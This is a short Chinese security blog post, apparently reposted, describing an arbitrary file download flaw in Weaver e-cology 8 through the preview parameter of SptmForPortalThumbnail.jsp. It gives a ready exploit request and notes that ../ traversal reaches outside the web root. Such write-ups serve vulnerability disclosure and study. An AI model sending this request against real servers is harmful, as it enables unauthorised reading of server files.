稻草人博客-泛微e-cology8任意文件下载

2023年6月15日11:25:05已关闭评论206 views字数 227阅读0分45秒阅读模式

漏洞原理

SptmForPortalThumbnail.jsp可控的preview参数未进行过滤操作，直接拼接上web根目录进行文件下载，
blockchain

漏洞利用

不要直接在浏览器上面用get请求查看返回参数，因为你啥也看不到，只会给你返回一张死掉的图片
blockchain

利用burp或者py发包
blockchain

请求包输入

/portal/SptmForPortalThumbnail.jsp?preview=portal/SptmForPortalThumbnail.jsp

总结

可以通过../穿越出web目录

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

低成本本地部署DeepSeek

PG_Vmdak

如何搭建符号执行环境并跑通第一个测试样例

渗透测试|柳暗花明(记一次有趣的高危漏洞以及思考修复方案)

从通过 .js 文件中找到的 URL 访问受限功能，到通过修改 API上HTTP响应中的accessLevel值进行权限提升

Web3 安全入门避坑指南｜剪贴板安全

利用n8n结合ollama-Deepseek大模型创建智能体

如何利用图像验证技术识别钓鱼攻击？

Webshell免杀思路-PHP篇-1：经典混淆的艺术

CimFS：内存崩溃，查找系统（内核版）

本文由 admin 发表于 2023年6月15日11:25:05
转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出)：
稻草人博客-泛微e-cology8任意文件下载http://cn-sec.com/archives/1803559.html
免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉.

目录

在线咨询

13688888888

8888 QQ在线咨询

微信
本页二维码